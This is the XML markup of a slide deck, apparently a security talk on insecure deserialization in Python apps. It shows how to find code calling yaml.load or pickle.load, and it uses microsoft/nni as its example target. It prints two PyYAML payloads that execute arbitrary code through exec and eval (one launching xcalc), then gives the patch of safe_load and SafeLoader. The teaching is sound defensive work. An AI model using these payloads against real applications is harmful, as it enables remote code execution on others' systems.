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Permanent Marker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ermanentMarker-regular.fntdata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6d3eb9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6d3eb9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edb2d9b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edb2d9b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657af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657af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4f3276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4f3276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6d3eb9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6d3eb9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4f3276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4f3276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untr.dev/users/b3e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rep.app" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lgtm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hub.com/microsoft/nn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aml/pyyaml/issues/42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95700"/>
            <a:ext cx="8520600" cy="19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aveat"/>
                <a:ea typeface="Caveat"/>
                <a:cs typeface="Caveat"/>
                <a:sym typeface="Caveat"/>
              </a:rPr>
              <a:t>Deserialization Attacks in </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="43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aveat"/>
                <a:ea typeface="Caveat"/>
                <a:cs typeface="Caveat"/>
                <a:sym typeface="Caveat"/>
              </a:rPr>
              <a:t>Python Apps</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="43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aveat"/>
                <a:ea typeface="Caveat"/>
                <a:cs typeface="Caveat"/>
                <a:sym typeface="Caveat"/>
              </a:rPr>
              <a:t>[part 1]</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="43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825" y="3479975"/>
            <a:ext cx="1325100" cy="1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71100" y="110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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1920">
                <a:solidFill>
                  <a:srgbClr val="00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WHOAMI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1920"/>
              <a:t>:~</a:t>
            </a:r>
            <a:endParaRPr sz="1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51500" y="2179850"/>
            <a:ext cx="38643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Ajmal Aboobacker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Username : B3EF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LinkedIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="800"/>
              <a:t>https://www.linkedin.com/in/ajmal-aboobacker-346a87176/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Huntr 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https://www.huntr.dev/users/b3ef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Computer Science And Engineering Student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400" y="1563375"/>
            <a:ext cx="3081925" cy="21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73050" y="1389150"/>
            <a:ext cx="53979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b="1" lang="en">
                <a:latin typeface="Permanent Marker"/>
                <a:ea typeface="Permanent Marker"/>
                <a:cs typeface="Permanent Marker"/>
                <a:sym typeface="Permanent Marker"/>
              </a:rPr>
              <a:t>How to find vulnerable package ? </a:t>
            </a:r>
            <a:endParaRPr b="1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b="1" lang="en">
                <a:latin typeface="Permanent Marker"/>
                <a:ea typeface="Permanent Marker"/>
                <a:cs typeface="Permanent Marker"/>
                <a:sym typeface="Permanent Marker"/>
              </a:rPr>
              <a:t>Is it Exploitable ? </a:t>
            </a:r>
            <a:endParaRPr b="1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b="1" lang="en">
                <a:latin typeface="Permanent Marker"/>
                <a:ea typeface="Permanent Marker"/>
                <a:cs typeface="Permanent Marker"/>
                <a:sym typeface="Permanent Marker"/>
              </a:rPr>
              <a:t>How to build an Exploit ?</a:t>
            </a:r>
            <a:endParaRPr b="1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b="1" lang="en">
                <a:latin typeface="Permanent Marker"/>
                <a:ea typeface="Permanent Marker"/>
                <a:cs typeface="Permanent Marker"/>
                <a:sym typeface="Permanent Marker"/>
              </a:rPr>
              <a:t>How to patch the bug ?</a:t>
            </a:r>
            <a:endParaRPr b="1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How to find vulnerable package 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i="1" lang="en" sz="1200"/>
              <a:t>Common insecure deserialization code patterns </a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"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</a:rPr>
              <a:t>yaml</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1200"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>load</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="12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</a:rPr>
              <a:t>yaml</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1200"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>load</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“x”,Loader=FullLoader) </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1200"/>
              <a:t>// check the loader used</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00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</a:rPr>
              <a:t>pickle</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1200"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>load</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="00FFFF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i="1" lang="en" sz="1200"/>
              <a:t>How to find a package ?</a:t>
            </a:r>
            <a:endParaRPr b="1" i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/>
              <a:t>*  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1200"/>
              <a:t>Github</a:t>
            </a:r>
            <a:endParaRPr b="1" i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/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://grep.app</a:t>
            </a:r>
            <a:endParaRPr b="1" i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/>
              <a:t>* Codeql :-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://lgtm.com/</a:t>
            </a:r>
            <a:endParaRPr b="1" i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latin typeface="Permanent Marker"/>
                <a:ea typeface="Permanent Marker"/>
                <a:cs typeface="Permanent Marker"/>
                <a:sym typeface="Permanent Marker"/>
              </a:rPr>
              <a:t>IS IT </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1820">
                <a:solidFill>
                  <a:srgbClr val="98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EXPLOITABLE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1820">
                <a:latin typeface="Permanent Marker"/>
                <a:ea typeface="Permanent Marker"/>
                <a:cs typeface="Permanent Marker"/>
                <a:sym typeface="Permanent Marker"/>
              </a:rPr>
              <a:t> ? / Writing an </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="182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exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1820">
                <a:latin typeface="Permanent Marker"/>
                <a:ea typeface="Permanent Marker"/>
                <a:cs typeface="Permanent Marker"/>
                <a:sym typeface="Permanent Marker"/>
              </a:rPr>
              <a:t> !</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="182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688450" y="2006250"/>
            <a:ext cx="37671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ermanent Marker"/>
              <a:buChar char="●"/>
            </a:pP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Use python virtual </a:t>
            </a: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environment</a:t>
            </a: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 for testing</a:t>
            </a:r>
            <a:endParaRPr sz="10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latin typeface="Permanent Marker"/>
                <a:ea typeface="Permanent Marker"/>
                <a:cs typeface="Permanent Marker"/>
                <a:sym typeface="Permanent Marker"/>
              </a:rPr>
              <a:t>Code : </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>python3 -m venv &lt;envname&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="10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https://docs.python.org/3/library/venv.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t> 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Permanent Marker"/>
                <a:ea typeface="Permanent Marker"/>
                <a:cs typeface="Permanent Marker"/>
                <a:sym typeface="Permanent Marker"/>
              </a:rPr>
              <a:t>Example package used here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>microsoft/nni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https://github.com/microsoft/nni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CREATING EXPLOIT :- </a:t>
            </a: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yaml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.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent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load</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent6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ermanent Marker"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Permanent Marker"/>
                <a:ea typeface="Permanent Marker"/>
                <a:cs typeface="Permanent Marker"/>
                <a:sym typeface="Permanent Marker"/>
              </a:rPr>
              <a:t>Common payloads used : </a:t>
            </a:r>
            <a:endParaRPr sz="13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</a:rPr>
              <a:t># using python exec</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:srgbClr val="00FF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```!!python/object/new:type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  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]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  listitems: "__import__('os').system('xcalc')"```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</a:rPr>
              <a:t># using python eval </a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:srgbClr val="00FF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```!!python/object/new:tuple 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- !!python/object/new:map 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  - !!python/name:eval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  - [ "RCE_HERE" ] ```</a:t>
            </a:r>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr indent="-29280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ermanent Marker"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1304">
                <a:latin typeface="Permanent Marker"/>
                <a:ea typeface="Permanent Marker"/>
                <a:cs typeface="Permanent Marker"/>
                <a:sym typeface="Permanent Marker"/>
              </a:rPr>
              <a:t>More on payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1304" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/yaml/pyyaml/issues/420</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1304"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="130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73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#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PATCH :~ </a:t>
            </a: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yaml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent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load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()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811100" y="2571750"/>
            <a:ext cx="55218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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00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safe_load() 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instead of </a:t>
            </a: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load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00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SafeLoader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 instead of </a:t>
            </a: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FullLoader</a:t>
            </a:r>
            <a:endParaRPr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